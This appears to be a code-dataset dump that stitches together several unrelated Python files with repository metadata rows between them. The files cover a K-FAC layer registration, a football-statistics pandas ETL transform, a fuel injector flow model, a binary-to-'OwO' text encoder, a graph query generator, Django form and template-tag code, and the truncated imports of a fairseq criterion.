fc_baseline = nn.fully_connected(fc4, self._params['fc_baseline'])
activations['fc_baseline'] = fc_baseline
return preactivations, activations
def register_layers(self, layer_collection):
"""Registers the layers of this model (neural net) in the specified :obj:`kfac.LayerCollection`
(required for K-FAC).
Args:
layer_collection (:obj:`kfac.LayerCollection`):
A layer collection used by the :obj:`~kfac.KfacOptimizer`.
"""
layer_collection.register_conv2d(
self._params['conv1'], strides=[1, 4, 4, 1], padding='VALID',
inputs=self._flat_observations, outputs=self._preactivations['conv1'])
layer_collection.register_conv2d(
self._params['conv2'], strides=[1, 2, 2, 1], padding='VALID',
inputs=self._activations['conv1'], outputs=self._preactivations['conv2'])
layer_collection.register_conv2d(
self._params['conv3'], strides=[1, 1, 1, 1], padding='VALID',
inputs=self._activations['conv2'], outputs=self._preactivations['conv3'])
layer_collection.register_fully_connected(
self._params['fc4'], inputs=self._activations['conv3'], outputs=self._preactivations['fc4'])
layer_collection.register_fully_connected(
self._params['fc_policy'], inputs=self._activations['fc4'], outputs=self._activations['fc_policy'])
layer_collection.register_fully_connected(
self._params['fc_baseline'], inputs=self._activations['fc4'], outputs=self._activations['fc_baseline'])
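A minimal sketch of how register_layers is typically wired into a K-FAC setup; the kfac package import, the fc_policy activation lookup, and the optimizer hyperparameters below are assumptions for illustration, not part of this file.
import kfac  # assumed available: the tensorflow-kfac package

def build_kfac_optimizer(model):
    # Hedged sketch: register the model's layers plus its predictive
    # distribution, then construct the optimizer over that collection.
    layer_collection = kfac.LayerCollection()
    model.register_layers(layer_collection)
    # Assumption: the policy logits live in model._activations['fc_policy'].
    layer_collection.register_categorical_predictive_distribution(
        model._activations['fc_policy'])
    return kfac.KfacOptimizer(
        learning_rate=0.25, cov_ema_decay=0.95, damping=1e-2,
        layer_collection=layer_collection, momentum=0.9)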
| 46.246964
| 119
| 0.660597
| 11,109
| 0.972512
| 0
| 0
| 0
| 0
| 0
| 0
| 4,007
| 0.350784
|
afaf5d11e5a28c1db05bcfd2d0127aa64f8b14b1
| 18,044
|
py
|
Python
|
marcotti/etl/base/transform.py
|
soccermetrics/marcotti
|
eda2f19bd6cbc6f9c7482e8fe31b2233b33aacfd
|
[
"MIT"
] | 30
|
2015-11-23T07:51:54.000Z
|
2020-06-29T16:11:55.000Z
|
marcotti/etl/base/transform.py
|
soccermetrics/marcotti
|
eda2f19bd6cbc6f9c7482e8fe31b2233b33aacfd
|
[
"MIT"
] | 1
|
2016-06-26T18:44:47.000Z
|
2016-06-29T03:02:40.000Z
|
marcotti/etl/base/transform.py
|
soccermetrics/marcotti
|
eda2f19bd6cbc6f9c7482e8fe31b2233b33aacfd
|
[
"MIT"
] | 8
|
2016-01-13T12:23:16.000Z
|
2021-10-11T07:39:33.000Z
|
import pandas as pd
import marcotti.models.club as mc
import marcotti.models.common.enums as enums
import marcotti.models.common.overview as mco
import marcotti.models.common.personnel as mcp
import marcotti.models.common.suppliers as mcs
from .workflows import WorkflowBase
class MarcottiTransform(WorkflowBase):
"""
Transform and validate extracted data.
"""
@staticmethod
def suppliers(data_frame):
return data_frame
@staticmethod
def years(data_frame):
return data_frame
@staticmethod
def seasons(data_frame):
return data_frame
def competitions(self, data_frame):
if 'country' in data_frame.columns:
transformed_field = 'country'
lambdafunc = lambda x: pd.Series(self.get_id(mco.Countries, name=x[transformed_field]))
id_frame = data_frame.apply(lambdafunc, axis=1)
id_frame.columns = ['country_id']
elif 'confed' in data_frame.columns:
transformed_field = 'confed'
lambdafunc = lambda x: pd.Series(enums.ConfederationType.from_string(x[transformed_field]))
id_frame = data_frame.apply(lambdafunc, axis=1)
id_frame.columns = ['confederation']
else:
raise KeyError("Cannot insert Competition record: No Country or Confederation data present")
return data_frame.join(id_frame).drop(transformed_field, axis=1)
def countries(self, data_frame):
lambdafunc = lambda x: pd.Series(enums.ConfederationType.from_string(x['confed']))
id_frame = data_frame.apply(lambdafunc, axis=1)
id_frame.columns = ['confederation']
joined_frame = data_frame.join(id_frame).drop('confed', axis=1)
return joined_frame
def clubs(self, data_frame):
if 'country' in data_frame.columns:
lambdafunc = lambda x: pd.Series(self.get_id(mco.Countries, name=x['country']))
id_frame = data_frame.apply(lambdafunc, axis=1)
id_frame.columns = ['country_id']
else:
raise KeyError("Cannot insert Club record: No Country data present")
return data_frame.join(id_frame)
def venues(self, data_frame):
lambdafunc = lambda x: pd.Series([
self.get_id(mco.Countries, name=x['country']),
self.get_id(mco.Timezones, name=x['timezone']),
self.get_id(mco.Surfaces, description=x['surface']),
self.make_date_object(x['config_date'])
])
ids_frame = data_frame.apply(lambdafunc, axis=1)
ids_frame.columns = ['country_id', 'timezone_id', 'surface_id', 'eff_date']
joined_frame = data_frame.join(ids_frame).drop(['country', 'timezone', 'surface', 'config_date'], axis=1)
new_frame = joined_frame.where((pd.notnull(joined_frame)), None)
return new_frame
def timezones(self, data_frame):
lambdafunc = lambda x: pd.Series(enums.ConfederationType.from_string(x['confed']))
id_frame = data_frame.apply(lambdafunc, axis=1)
id_frame.columns = ['confederation']
joined_frame = data_frame.join(id_frame).drop('confed', axis=1)
return joined_frame
def positions(self, data_frame):
lambdafunc = lambda x: pd.Series(enums.PositionType.from_string(x['position_type']))
id_frame = data_frame.apply(lambdafunc, axis=1)
id_frame.columns = ['type']
joined_frame = data_frame.join(id_frame).drop('position_type', axis=1)
return joined_frame
def surfaces(self, data_frame):
lambdafunc = lambda x: pd.Series(enums.SurfaceType.from_string(x['surface_type']))
id_frame = data_frame.apply(lambdafunc, axis=1)
id_frame.columns = ['type']
joined_frame = data_frame.join(id_frame).drop('surface_type', axis=1)
return joined_frame
def players(self, data_frame):
lambdafunc = lambda x: pd.Series([
self.make_date_object(x['dob']),
enums.NameOrderType.from_string(x['name_order'] or 'Western'),
self.get_id(mco.Countries, name=x['country']),
self.get_id(mcs.PositionMap, remote_id=x['remote_position_id'], supplier_id=self.supplier_id)
])
ids_frame = data_frame.apply(lambdafunc, axis=1)
ids_frame.columns = ['birth_date', 'order', 'country_id', 'position_id']
joined_frame = data_frame.join(ids_frame).drop(
['dob', 'name_order', 'country', 'remote_position_id'], axis=1)
return joined_frame
def managers(self, data_frame):
lambdafunc = lambda x: pd.Series([
self.make_date_object(x['dob']),
enums.NameOrderType.from_string(x['name_order'] or 'Western'),
self.get_id(mco.Countries, name=x['country'])
])
ids_frame = data_frame.apply(lambdafunc, axis=1)
ids_frame.columns = ['birth_date', 'order', 'country_id']
joined_frame = data_frame.join(ids_frame).drop(['dob', 'name_order', 'country'], axis=1)
return joined_frame
def referees(self, data_frame):
lambdafunc = lambda x: pd.Series([
self.make_date_object(x['dob']),
enums.NameOrderType.from_string(x['name_order'] or 'Western'),
self.get_id(mco.Countries, name=x['country'])
])
ids_frame = data_frame.apply(lambdafunc, axis=1)
ids_frame.columns = ['birth_date', 'order', 'country_id']
joined_frame = data_frame.join(ids_frame).drop(['dob', 'name_order', 'country'], axis=1)
return joined_frame
def league_matches(self, data_frame):
lambdafunc = lambda x: pd.Series([
self.get_id(mco.Competitions, name=x['competition']),
self.get_id(mco.Seasons, name=x['season']),
self.get_id(mco.Venues, name=x['venue']),
self.get_id(mc.Clubs, name=x['home_team']),
self.get_id(mc.Clubs, name=x['away_team']),
self.get_id(mcp.Managers, full_name=x['home_manager']),
self.get_id(mcp.Managers, full_name=x['away_manager']),
self.get_id(mcp.Referees, full_name=x['referee']),
self.make_date_object(x['date']),
enums.WeatherConditionType.from_string(x['kickoff_wx']) if x['kickoff_wx'] else None,
enums.WeatherConditionType.from_string(x['halftime_wx']) if x['halftime_wx'] else None,
enums.WeatherConditionType.from_string(x['fulltime_wx']) if x['fulltime_wx'] else None
])
ids_frame = data_frame.apply(lambdafunc, axis=1)
ids_frame.columns = ['competition_id', 'season_id', 'venue_id', 'home_team_id', 'away_team_id',
'home_manager_id', 'away_manager_id', 'referee_id', 'match_date',
'kickoff_weather', 'halftime_weather', 'fulltime_weather']
columns_to_drop = ['competition', 'season', 'venue', 'home_team', 'away_team', 'home_manager',
'away_manager', 'referee', 'date', 'kickoff_wx', 'halftime_wx', 'fulltime_wx']
return data_frame.join(ids_frame).drop(columns_to_drop, axis=1)
def knockout_matches(self, data_frame):
lambdafunc = lambda x: pd.Series([
self.get_id(mco.Competitions, name=x['competition']),
self.get_id(mco.Seasons, name=x['season']),
self.get_id(mco.Venues, name=x['venue']),
self.get_id(mc.Clubs, name=x['home_team']),
self.get_id(mc.Clubs, name=x['away_team']),
self.get_id(mcp.Managers, full_name=x['home_manager']),
self.get_id(mcp.Managers, full_name=x['away_manager']),
self.get_id(mcp.Referees, full_name=x['referee']),
enums.KnockoutRoundType.from_string(x['round']),
self.make_date_object(x['date']),
enums.WeatherConditionType.from_string(x['kickoff_wx']) if x['kickoff_wx'] else None,
enums.WeatherConditionType.from_string(x['halftime_wx']) if x['halftime_wx'] else None,
enums.WeatherConditionType.from_string(x['fulltime_wx']) if x['fulltime_wx'] else None
])
ids_frame = data_frame.apply(lambdafunc, axis=1)
ids_frame.columns = ['competition_id', 'season_id', 'venue_id', 'home_team_id', 'away_team_id',
'home_manager_id', 'away_manager_id', 'referee_id', 'ko_round', 'match_date',
'kickoff_weather', 'halftime_weather', 'fulltime_weather']
columns_to_drop = ['competition', 'season', 'venue', 'home_team', 'away_team', 'home_manager',
'away_manager', 'referee', 'date', 'round', 'kickoff_wx', 'halftime_wx', 'fulltime_wx']
return data_frame.join(ids_frame).drop(columns_to_drop, axis=1)
def group_matches(self, data_frame):
lambdafunc = lambda x: pd.Series([
self.get_id(mco.Competitions, name=x['competition']),
self.get_id(mco.Seasons, name=x['season']),
self.get_id(mco.Venues, name=x['venue']),
self.get_id(mc.Clubs, name=x['home_team']),
self.get_id(mc.Clubs, name=x['away_team']),
self.get_id(mcp.Managers, full_name=x['home_manager']),
self.get_id(mcp.Managers, full_name=x['away_manager']),
self.get_id(mcp.Referees, full_name=x['referee']),
enums.GroupRoundType.from_string(x['round']),
self.make_date_object(x['date']),
enums.WeatherConditionType.from_string(x['kickoff_wx']) if x['kickoff_wx'] else None,
enums.WeatherConditionType.from_string(x['halftime_wx']) if x['halftime_wx'] else None,
enums.WeatherConditionType.from_string(x['fulltime_wx']) if x['fulltime_wx'] else None
])
ids_frame = data_frame.apply(lambdafunc, axis=1)
ids_frame.columns = ['competition_id', 'season_id', 'venue_id', 'home_team_id', 'away_team_id',
'home_manager_id', 'away_manager_id', 'referee_id', 'group_round', 'match_date',
'kickoff_weather', 'halftime_weather', 'fulltime_weather']
columns_to_drop = ['competition', 'season', 'venue', 'home_team', 'away_team', 'home_manager',
'away_manager', 'referee', 'date', 'round', 'kickoff_wx', 'halftime_wx', 'fulltime_wx']
return data_frame.join(ids_frame).drop(columns_to_drop, axis=1)
def match_lineups(self, data_frame):
lambdafunc = lambda x: pd.Series([
self.get_id(mc.ClubLeagueMatches,
competition_id=self.get_id(mco.Competitions, name=x['competition']),
season_id=self.get_id(mco.Seasons, name=x['season']),
matchday=x['matchday'],
home_team_id=self.get_id(mc.Clubs, name=x['home_team']),
away_team_id=self.get_id(mc.Clubs, name=x['away_team'])),
self.get_id(mc.Clubs, name=x['player_team']),
self.get_id(mcp.Players, full_name=x['player_name'])
])
ids_frame = data_frame.apply(lambdafunc, axis=1)
ids_frame.columns = ['match_id', 'team_id', 'player_id']
columns_to_drop = ['competition', 'season', 'matchday', 'home_team', 'away_team']
return data_frame.join(ids_frame).drop(columns_to_drop, axis=1)
def goals(self, data_frame):
lambdafunc = lambda x: pd.Series([
self.get_id(mc.ClubMatchLineups,
match_id=self.get_id(mcs.MatchMap, remote_id=x['remote_match_id'],
supplier_id=self.supplier_id),
player_id=self.get_id(mcp.Players, full_name=x['scorer'])),
self.get_id(mc.Clubs, name=x['scoring_team']),
enums.ShotEventType.from_string(x['scoring_event']),
enums.BodypartType.from_string(x['bodypart_desc'])
])
ids_frame = data_frame.apply(lambdafunc, axis=1)
ids_frame.columns = ['lineup_id', 'team_id', 'event', 'bodypart']
columns_to_drop = ['remote_match_id', 'scorer', 'scoring_team', 'scoring_event', 'bodypart_desc']
return data_frame.join(ids_frame).drop(columns_to_drop, axis=1)
def penalties(self, data_frame):
lambdafunc = lambda x: pd.Series([
self.get_id(mc.ClubMatchLineups,
match_id=self.get_id(mcs.MatchMap, remote_id=x['remote_match_id'],
supplier_id=self.supplier_id),
player_id=self.get_id(mcp.Players, full_name=x['penalty_taker'])),
enums.FoulEventType.from_string(x['penalty_foul']),
enums.ShotOutcomeType.from_string(x['penalty_outcome'])
])
ids_frame = data_frame.apply(lambdafunc, axis=1)
ids_frame.columns = ['lineup_id', 'foul', 'outcome']
columns_to_drop = ['remote_match_id', 'penalty_taker', 'penalty_foul', 'penalty_outcome']
return data_frame.join(ids_frame).drop(columns_to_drop, axis=1)
def bookables(self, data_frame):
lambdafunc = lambda x: pd.Series([
self.get_id(mc.ClubMatchLineups,
match_id=self.get_id(mcs.MatchMap, remote_id=x['remote_match_id'],
supplier_id=self.supplier_id),
player_id=self.get_id(mcp.Players, full_name=x['player'])),
enums.FoulEventType.from_string(x['foul_desc']),
enums.CardType.from_string(x['card_type'])
])
ids_frame = data_frame.apply(lambdafunc, axis=1)
ids_frame.columns = ['lineup_id', 'foul', 'card']
columns_to_drop = ['remote_match_id', 'player', 'foul_desc', 'card_type']
return data_frame.join(ids_frame).drop(columns_to_drop, axis=1)
def substitutions(self, data_frame):
lambdafunc = lambda x: pd.Series([
self.get_id(mc.ClubMatchLineups,
match_id=self.get_id(mcs.MatchMap, remote_id=x['remote_match_id'],
supplier_id=self.supplier_id),
player_id=self.get_id(mcp.Players, full_name=x['in_player_name'])),
self.get_id(mc.ClubMatchLineups,
match_id=self.get_id(mcs.MatchMap, remote_id=x['remote_match_id'],
supplier_id=self.supplier_id),
player_id=self.get_id(mcp.Players, full_name=x['out_player_name']))
])
ids_frame = data_frame.apply(lambdafunc, axis=1)
ids_frame.columns = ['lineup_in_id', 'lineup_out_id']
columns_to_drop = ['remote_match_id', 'in_player_name', 'out_player_name']
return data_frame.join(ids_frame).drop(columns_to_drop, axis=1)
def penalty_shootouts(self, data_frame):
lambdafunc = lambda x: pd.Series([
self.get_id(mc.ClubMatchLineups,
match_id=self.get_id(mcs.MatchMap, remote_id=x['remote_match_id'], supplier_id=self.supplier_id),
player_id=self.get_id(mcp.Players, full_name=x['penalty_taker'])),
enums.ShotOutcomeType.from_string(x['penalty_outcome'])
])
ids_frame = data_frame.apply(lambdafunc, axis=1)
ids_frame.columns = ['lineup_id', 'outcome']
columns_to_drop = ['remote_match_id', 'penalty_taker', 'penalty_outcome']
return data_frame.join(ids_frame).drop(columns_to_drop, axis=1)
class MarcottiStatsTransform(MarcottiTransform):
categories = ['assists', 'clearances', 'corner_crosses', 'corners', 'crosses', 'defensives',
'discipline', 'duels', 'foul_wins', 'freekicks', 'gk_actions', 'gk_allowed_goals',
'gk_allowed_shots', 'gk_saves', 'goal_bodyparts', 'goal_locations', 'goal_totals',
'goalline_clearances', 'important_plays', 'pass_directions', 'pass_lengths',
'pass_locations', 'pass_totals', 'penalty_actions', 'shot_blocks', 'shot_bodyparts',
'shot_locations', 'shot_plays', 'shot_totals', 'tackles', 'throwins', 'touch_locations',
'touches']
def __init__(self, session, supplier):
super(MarcottiStatsTransform, self).__init__(session, supplier)
for category in MarcottiStatsTransform.categories:
add_stats_fn(category)
def add_stats_fn(category):
def fn(self, data_frame):
lambdafunc = lambda x: pd.Series([
self.get_id(mcs.PlayerMap, remote_id=x['remote_player_id'], supplier_id=self.supplier_id),
self.get_id(mc.ClubMap, remote_id=x['remote_player_team_id'], supplier_id=self.supplier_id),
self.get_id(mc.ClubMap, remote_id=x['remote_opposing_team_id'], supplier_id=self.supplier_id)
])
ids_frame = data_frame.apply(lambdafunc, axis=1)
ids_frame.columns = ['player_id', 'player_team_id', 'opposing_team_id']
columns_to_drop = ['remote_player_id', 'remote_player_team_id', 'remote_opposing_team_id']
inter_frame = data_frame.join(ids_frame).drop(columns_to_drop, axis=1)
outerlambdafunc = lambda x: pd.Series([
self.get_id(mc.ClubMatchLineups,
match_id=self.get_id(
mc.ClubLeagueMatches,
home_team_id=x['player_team_id'] if x['locale'] == 'Home' else x['opposing_team_id'],
away_team_id=x['opposing_team_id'] if x['locale'] == 'Away' else x['player_team_id'],
date=x['match_date']),
player_id=x['player_id'])
])
outerids_frame = inter_frame.apply(outerlambdafunc, axis=1)
outerids_frame.columns = ['lineup_id']
more_columns_to_drop = ['player_team_id', 'opposing_team_id', 'match_date', 'locale', 'player_id']
return inter_frame.join(outerids_frame).drop(more_columns_to_drop, axis=1)
setattr(MarcottiStatsTransform, category, fn)
fn.__name__ = category
fn.__doc__ = "Data transformation for {} method".format(category)
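Every transform method above follows the same apply/join/drop pandas pattern; a self-contained toy version of it (the lookup table and column names are invented for the example):
import pandas as pd

lookup = {'England': 1, 'Spain': 2}  # stand-in for the get_id() database lookups
data_frame = pd.DataFrame({'name': ['Arsenal', 'Real Madrid'],
                           'country': ['England', 'Spain']})
# Derive the id column row by row, join it back, drop the raw text field.
id_frame = data_frame.apply(lambda x: pd.Series(lookup[x['country']]), axis=1)
id_frame.columns = ['country_id']
print(data_frame.join(id_frame).drop('country', axis=1))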
| 54.349398
| 121
| 0.627854
| 16,036
| 0.888716
| 0
| 0
| 204
| 0.011306
| 0
| 0
| 4,060
| 0.225006
|
afb151ddaf6fe45b7776879d93b6a4036ec2ff77
| 2,863
|
py
|
Python
|
flow54/fuel_injector.py
|
corygoates/Flow54
|
d24fe113afb932df6a910b560c6d491693b87592
|
[
"MIT"
] | null | null | null |
flow54/fuel_injector.py
|
corygoates/Flow54
|
d24fe113afb932df6a910b560c6d491693b87592
|
[
"MIT"
] | null | null | null |
flow54/fuel_injector.py
|
corygoates/Flow54
|
d24fe113afb932df6a910b560c6d491693b87592
|
[
"MIT"
] | null | null | null |
import copy
import numpy as np
from compressible_tools import *
class FuelInjector:
"""A fuel injector.
Parameters
----------
fuel : Species
The fluid being fed through the injector.
T : float
Inlet temperature of injector.
A : float
Cross-sectional area.
"""
def __init__(self, fuel, T, A):
# Store
self.fuel = fuel
self.T = T
self.A = A
def calc_subcritical_injector_pressure(self, m_dot, p_ext):
"""Calculates the required pressure in the injector to supply the given massflow against the given exterior pressure. Assumes the injector is subsonic but compressible.
Parameters
----------
m_dot : float
Required massflow.
p_ext : float
Exterior pressure.
Returns
-------
p_inj : float
Required injector pressure.
"""
# Define function to find the root of
def f(p_inj):
return self.subcritical_massflow(p_inj, p_ext)-m_dot
# Find root using secant method
p0 = p_ext*1.1
p1 = p_ext*1.2
f0 = f(p0)
f1 = f(p1)
while abs(f1/m_dot)>1e-12:
# Get new pressure guess
p2 = p1-f1*(p0-p1)/(f0-f1)
# Update for next iteration
p0 = p1
p1 = p2
f0 = f1
f1 = f(p1)
# Check the result is subcritical
p_crit = (0.5*(self.fuel.gamma+1.0))**(self.fuel.gamma/(self.fuel.gamma-1.0))*p_ext
if p1 >= p_crit:
raise RuntimeError("Subcritical assumption of injector violated. Critical pressure is {0:1.6e}".format(p_crit))
return p1, p_crit
def subcritical_massflow(self, p_inj, p_ext):
"""Gives the massflow through the injector based on the injector pressure assuming the flow is subcritical.
Parameters
----------
        p_inj : float
            Injector pressure.
        p_ext : float
            Exterior pressure.
Returns
-------
m_dot : float
Massflow.
"""
a = (p_ext/p_inj)**(2.0/self.fuel.gamma)-(p_ext/p_inj)**((self.fuel.gamma+1.0)/self.fuel.gamma)
b = p_inj**2/(self.fuel.R_g*self.T)*a
c = 2.0*self.fuel.gamma/(self.fuel.gamma-1.0)*b
return self.A*np.sqrt(c)
def calc_velocity(self, p_inj, p_ext):
"""Gives the velocity through the injector based on the injector pressure assuming the flow is subcritical.
Parameters
----------
        p_inj : float
            Injector pressure.
        p_ext : float
            Exterior pressure.
Returns
-------
V : float
Velocity
"""
# Calculate massflow
m_dot = self.subcritical_massflow(p_inj, p_ext)
# Calculate density
rho = p_inj/(self.fuel.R_g*self.T)
return m_dot/(rho*self.A)
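A quick numeric check of the subcritical mass-flow relation used above, with a stand-in fuel object (gamma and R_g are illustrative, roughly methane-like values):
import numpy as np

class Fuel:
    gamma = 1.3   # illustrative ratio of specific heats
    R_g = 518.3   # illustrative specific gas constant, J/(kg*K)

def subcritical_massflow(fuel, T, A, p_inj, p_ext):
    # Same relation as FuelInjector.subcritical_massflow above.
    a = (p_ext/p_inj)**(2.0/fuel.gamma) - (p_ext/p_inj)**((fuel.gamma+1.0)/fuel.gamma)
    b = p_inj**2/(fuel.R_g*T)*a
    c = 2.0*fuel.gamma/(fuel.gamma-1.0)*b
    return A*np.sqrt(c)

# 1 mm^2 orifice at 300 K, 1.5 bar feeding into 1 bar (below the critical ratio):
print(subcritical_massflow(Fuel(), 300.0, 1e-6, 1.5e5, 1.0e5))  # ~2.4e-4 kg/s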
| 24.895652
| 176
| 0.550472
| 2,796
| 0.976598
| 0
| 0
| 0
| 0
| 0
| 0
| 1,500
| 0.523926
|
afb26810722dea2343152102b81238f0ece5d0c5
| 1,976
|
py
|
Python
|
owoencode.py
|
glitchfur/owoencoder
|
ed81a03ba4bd504ca2de4da80fa618b12363b9db
|
[
"MIT"
] | 4
|
2020-08-10T06:01:35.000Z
|
2021-08-30T02:26:29.000Z
|
owoencode.py
|
glitchfur/owoencoder
|
ed81a03ba4bd504ca2de4da80fa618b12363b9db
|
[
"MIT"
] | null | null | null |
owoencode.py
|
glitchfur/owoencoder
|
ed81a03ba4bd504ca2de4da80fa618b12363b9db
|
[
"MIT"
] | 1
|
2021-06-02T09:16:43.000Z
|
2021-06-02T09:16:43.000Z
|
#!/usr/bin/env python3
# owoencode.py, a part of owoencoder
# Made by Glitch, 2020
# https://www.glitchfur.net
from sys import argv, stdout, stderr
from os.path import exists, split
from os import remove
KEEP_ORIG = False
STDOUT_FLAG = False
def main():
if len(argv) < 2:
print("The syntax for running this script is as follows:")
print("python owoencode.py [-kc] <original_file> [ ... ]")
exit(0)
in_fns = argv[1:]
# There is probably a better way to handle parameters. But considering
# there are only two, I'm not too worried about it right now.
    for param in in_fns[:]:  # iterate over a copy: the list is mutated below
if param.startswith("-"):
global KEEP_ORIG
global STDOUT_FLAG
if "k" in param:
KEEP_ORIG = True
if "c" in param:
STDOUT_FLAG = True
KEEP_ORIG = True # Output going to stdout, keep original file
in_fns.remove(param)
    for fn in in_fns[:]:  # iterate over a copy: the list is mutated below
if not exists(fn):
print("%s: No such file or directory" % fn, file=stderr)
exit(1)
if exists("%s.owo" % fn):
print("%s: Encoding would cause a naming conflict " \
"with an existing file, ignoring" % fn)
in_fns.remove(fn)
out_fns = ["%s.owo" % fn for fn in in_fns]
for i in range(len(in_fns)):
encode(in_fns[i], out_fns[i])
def encode(in_fn, out_fn):
in_fp = open(in_fn, "rb")
if STDOUT_FLAG == False:
out_fp = open(out_fn, "w")
else:
out_fp = stdout
while True:
in_buffer = in_fp.read(1048576) # read 1MB at a time
if not in_buffer:
break
out_buffer = ''.join([bin(byte)[2:].zfill(8) for byte in in_buffer])
out_fp.write(out_buffer.replace("1", "OwO").replace("0", "UwU"))
in_fp.close()
if STDOUT_FLAG == False:
out_fp.close()
if KEEP_ORIG == False:
remove(in_fn)
if __name__ == "__main__":
main()
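For reference, a round-trip demonstration of the bit encoding used by encode(): each byte becomes eight OwO/UwU tokens, so the transformation is trivially invertible.
byte = ord('A')
bits = bin(byte)[2:].zfill(8)                      # '01000001'
owo = bits.replace('1', 'OwO').replace('0', 'UwU')
print(owo)                                         # 'UwUOwOUwUUwUUwUUwUUwUOwO'
decoded = int(owo.replace('OwO', '1').replace('UwU', '0'), 2)
assert decoded == byte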
| 30.875
| 77
| 0.577935
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 573
| 0.28998
|
afb31209b87b0007cddea5b09c524bff1b45d36d
| 2,589
|
py
|
Python
|
generators/query_gen.py
|
Abhipanda4/RQs_in_Regex_Graphs
|
80b86b5b3f92ef28102ac0f5049bb495b5cc07f9
|
[
"Apache-2.0"
] | 2
|
2018-10-09T09:59:45.000Z
|
2021-11-21T17:01:47.000Z
|
generators/query_gen.py
|
Abhipanda4/RQs_in_Regex_Graphs
|
80b86b5b3f92ef28102ac0f5049bb495b5cc07f9
|
[
"Apache-2.0"
] | null | null | null |
generators/query_gen.py
|
Abhipanda4/RQs_in_Regex_Graphs
|
80b86b5b3f92ef28102ac0f5049bb495b5cc07f9
|
[
"Apache-2.0"
] | null | null | null |
# Fix number of node predicates at 1 out of 6
# this ensures queries with larger space of possible nodes
# The number of colors in a query is varied from 1 to 5
import argparse
import numpy as np
from graph_gen import birth_years, genders, num_posts, num_friends
possibilities = [1, 3, 4, 5]
# do not consider equality as it will narrow down
# extreme node sets too much
op1 = ["<=", "<", ">", ">="]
op2 = ["==", "!="]
def construct_predicate():
# attribute 2 & 6 should never be considered
orig_query = ["__"] * 6
# num_preds = np.random.choice([0, 1, 2, 3])
num_preds = 3
selected_predicates = np.random.choice(possibilities, num_preds, replace=False)
for predicate in selected_predicates:
query = ""
if predicate == 1:
# birth_year
op_value = np.random.choice(birth_years)
op = np.random.choice(op1)
query += str(op)
query += str(op_value)
elif predicate == 3:
# sex
op_value = np.random.choice(genders)
op = np.random.choice(op2)
query += str(op)
query += str(op_value)
elif predicate == 4:
# posts
op_value = np.random.choice(num_posts)
op = np.random.choice(op1)
query += str(op)
query += str(op_value)
elif predicate == 5:
# friends
op_value = np.random.choice(num_friends)
op = np.random.choice(op1)
query += str(op)
query += str(op_value)
orig_query[predicate - 1] = query
return "".join(orig_query)
def construct_regex():
colors = ['a', 'b', 'c', 'd', 'e', 'f']
# some parameters to fix for queries
max_colors = 4
max_len = 8
ops = ["", "<="]
# reg_len = np.random.randint(1, max_colors + 1)
reg_len = 3
np.random.shuffle(colors)
regex = ""
for color in colors[:reg_len]:
regex += color
op = np.random.choice(ops)
if op != "<=":
regex += op
else:
regex += op
regex += str(np.random.randint(2, max_len + 1))
return regex
def construct_query():
pred1 = construct_predicate()
pred2 = construct_predicate()
regex = construct_regex()
return pred1 + " " + pred2 + " " + regex
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--Q", type=int, default=10)
args = parser.parse_args()
print(args.Q)
for i in range(args.Q):
print(construct_query())
if __name__ == "__main__":
main()
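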
| 27.83871
| 83
| 0.565469
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 520
| 0.20085
|
afb50c8aa67608ab3deea105ffee6debac103ea3
| 195
|
py
|
Python
|
multiplepagesproject/prodforms.py
|
mandeep-django/admin-panel
|
30c65730e74004ec21cf891627fbbaa027f626db
|
[
"MIT"
] | null | null | null |
multiplepagesproject/prodforms.py
|
mandeep-django/admin-panel
|
30c65730e74004ec21cf891627fbbaa027f626db
|
[
"MIT"
] | null | null | null |
multiplepagesproject/prodforms.py
|
mandeep-django/admin-panel
|
30c65730e74004ec21cf891627fbbaa027f626db
|
[
"MIT"
] | null | null | null |
from django import forms
from multiplepagesproject.prodmodels import proddisplay
class productforms(forms.ModelForm):
class Meta:
model = proddisplay
fields = "__all__"
| 27.857143
| 56
| 0.723077
| 110
| 0.564103
| 0
| 0
| 0
| 0
| 0
| 0
| 9
| 0.046154
|
afb5ce60435e8b3c83936754903becf1fcb4fbdf
| 1,292
|
py
|
Python
|
communication/templatetags/discussion.py
|
stewardshiptools/stewardshiptools
|
ee5d27e7b0d5d4947f34ad02bdf63a06ad0a5c3e
|
[
"MIT"
] | null | null | null |
communication/templatetags/discussion.py
|
stewardshiptools/stewardshiptools
|
ee5d27e7b0d5d4947f34ad02bdf63a06ad0a5c3e
|
[
"MIT"
] | 11
|
2020-03-24T15:29:46.000Z
|
2022-03-11T23:14:48.000Z
|
communication/templatetags/discussion.py
|
stewardshiptools/stewardshiptools
|
ee5d27e7b0d5d4947f34ad02bdf63a06ad0a5c3e
|
[
"MIT"
] | null | null | null |
import string
from django.template import Context
from django.template.loader import get_template
from django import template
register = template.Library()
import crm
@register.inclusion_tag('comments/form.html')
def render_cedar_comment_form(**kwargs):
object = kwargs.pop('object', None)
parent_id = kwargs.pop('parent_id', None) # id of parent comment
if object is None:
raise AssertionError("object kwarg cannot be None")
else:
return {
'object': object,
'parent_id': parent_id
}
#
# response = {
# 'element_id': kwargs.pop('element_id', None),
# 'data': data,
# 'related_object': related_object,
# 'include_toolbar': kwargs.pop('include_toolbar', True)
# }
    # return response
# @register.filter
# def render_related_communication_items(related_object):
# '''
# Called by the CommunicationViewset
# to render data if html is requested.
# :param related_object:
# :return: rendered communication items list (<ul>)
# '''
# comms_objects = Communication.get_communications_related_to(related_object)
# context = Context({'data': comms_objects})
# t = get_template("communication/communication_items.html")
# return t.render(context)
| 28.711111
| 81
| 0.670279
| 0
| 0
| 0
| 0
| 625
| 0.483746
| 0
| 0
| 777
| 0.601393
|
afb6bce0846f3ad5fdbe2619d6c7b2dd5348269a
| 3,504
|
py
|
Python
|
fairseq/criterions/cross_entropy.py
|
emailandxu/KUST-Fairseq-ST
|
95316cebc99d963c4aa671914ce219c5692f5fd6
|
[
"BSD-3-Clause"
] | null | null | null |
fairseq/criterions/cross_entropy.py
|
emailandxu/KUST-Fairseq-ST
|
95316cebc99d963c4aa671914ce219c5692f5fd6
|
[
"BSD-3-Clause"
] | null | null | null |
fairseq/criterions/cross_entropy.py
|
emailandxu/KUST-Fairseq-ST
|
95316cebc99d963c4aa671914ce219c5692f5fd6
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the LICENSE file in
# the root directory of this source tree. An additional grant of patent rights
# can be found in the PATENTS file in the same directory.
import math
import torch
import torch.nn.functional as F
